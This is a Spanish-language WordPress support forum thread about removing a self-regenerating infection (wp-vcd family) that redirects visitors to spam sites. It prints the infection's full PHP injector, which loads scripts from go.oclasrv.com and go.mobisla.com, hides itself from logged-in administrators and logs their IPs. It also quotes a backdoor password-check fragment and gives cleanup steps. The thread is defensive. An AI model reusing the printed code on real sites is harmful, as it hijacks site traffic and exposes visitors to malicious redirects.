Como Eliminar malware » go.oclasrv.com» por completo
-
Saludos.
El enlace en referencia es un sitio de pruebas y producción.Quiero decirles que llevo un par de meses luchando contra este Adware Malware, virus o como quieran llamarle.
Se trata de un codgio que se auto regenera mediante 2 archivos .php, este es el sript.<script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1527634"></script>Ahora bien sabemos que la vulnerabilidad pudo ser detecta en algun plugin o falsa actualización descargada e instalada en e sitio, pero lo mas cumbre del caso es que todos las web alojadas fueron infectadas.
Este adware malware o como se le llame es un ladron de trafico, y mientras estas logueado como administrador nunca va a hacerce notar, una vez cierras la sesion y limpias la cache del navegador comienza a trabajar en tu web en cada click de enlace redirige a otros sitios sin relevancia ( porno, casinos, software basura, apuestas y pare de contar)
Donde se aloja? hasta ahora lo he detecta en la carpeta wp-include y son dos archivos php. wp-feed.php y wp-temp.php, estos archivos por mas que se borran vuelven a regenerarce, al escanear el sitio con Wordfence el los elimina y los pocos minutos estan regenerados nuevamente infectando el sitio.
Aqui les dejo el codigo de ambos.
wp-temp.phpini_set('display_errors', 0); error_reporting(0); $wp_auth_key='08b370e35d008b6591dd40b0eec23025'; if ( ! function_exists( 'slider_option' ) ) { function slider_option($content){ if(is_single()) { $con = ' '; $con2 = ' <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1527634"></script> <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1527635&interactive=1&pushup=1"></script> '; $content=$content.$con2; } return $content; } function slider_option_footer(){ if(!is_single()) { $con2 = ' <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1527634"></script> <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1527635&interactive=1&pushup=1"></script> '; echo $con2; } } function setting_my_first_cookie() { setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN); } if(is_user_logged_in()) { add_action( 'init', 'setting_my_first_cookie',1 ); } if( current_user_can('edit_others_pages')) { if (file_exists(ABSPATH.'wp-includes/wp-feed.php')) { $ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php'); } if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false) { $ip.=$_SERVER['REMOTE_ADDR'].' '; @file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip); } } $ref = $_SERVER['HTTP_REFERER']; $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com'); foreach ($SE as $source) { if (strpos($ref,$source)!==false) { setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); $sevisitor=true; } } if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) { $adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php'); if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false) { add_filter('the_content','slider_option'); add_action('wp_footer','slider_option_footer'); if($sevisitor==true || isset($_COOKIE['sevisitor'])) { } } } }Y el archivo wp-tem.php solo esta escrita la ip desde donde conecto a mi sitios wordpress.
Como bien lo he mencionado, he hecho todo lo recomendado, nuevas instalaciones de wp, eliminación de y re instalación de plugin, he saneado según lo remendado en este foro de soporte… y nada!! ha Cambie de host, y los problemas continúan.
Si alguno de vosotros habéis tenido este malware y lo ha solucionado, mucho le sabría agradecer, ya tengo muchos problemas tratando de recuperar el sitio y algunos de clientes y esto me tiene muy agotado.
Agradeciendo su atención y colaboraciones al caso.
Quedo atento de vuestros comentarios y agradeciendo la ayuda que me puedan prestar en este caso.
Un saludo.
La página con la que necesito ayuda: [accede para ver el enlace]
-
Recuerda que debes desactivar el cron de WordPress.
edita tu wp-config.php y agrega la linea para deshabilitar el cron.
define('DISABLE_WP_CRON', 'true');luego borra el archivo wp-includes/wp-feed.php y wp-includes/wp-tmp.php
luego debes ir a todos los functions.php de tus themes y borrar todo el código inyectado.
wp-content/themes/xxxxx/functions.php son las primera 184 lineas más o menos.
Ojo debes seguir al pie de la letra, ya que si no se deshabilitar el cron, se te infectara infinitas veces.
Saludos.
…por supuesto.
En en la carpeta wp-includes borramos los siguientes archivos:
wp-tmp.php wp-vcd.phpwp.feed.php no se había generado en nuestro caso.
En la carpeta de la plantilla/tema activo se restauró por la original el archivo functions.php ya que no hacemos modificaciones ahí. Si utilizas un «Child Theme» debes comprobar si está infectado.
IMPORTANTE: Al principio no caímos pero, al comprobar los temas por defecto de WordPress, pudimos ver que también tenían infectado el archivo functions.php por lo que fueron reemplazados por el original. Aunque nunca se hayan activado estaban infectados.
Volvimos a escanear con el plugin «Anti-Malware Security and Brute-Force Firewall» así como el servicio en línea de Securi y no detectaron nada.
Para quedarnos aún más tranquilos descargamos una copia comprimida de todo el contenido del sitio, lo descomprimimos en un equipo y buscamos las siguientes cadenas con la aplicaion gratuita EasyFind
La configuración de búsqueda fue: File Contens, Phrase, Ignore Case, Package Contens, Invisible Files & Contents
Los términos de búsqueda fueron:
go.oclasrv.com basepush.comif (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password']…y nos quedamos más tranquilos cuando ninguno de los tres fue encontrado.
Confiamos en que ayude.
Salu2.
- El debate ‘Como Eliminar malware » go.oclasrv.com» por completo’ está cerrado a nuevas respuestas.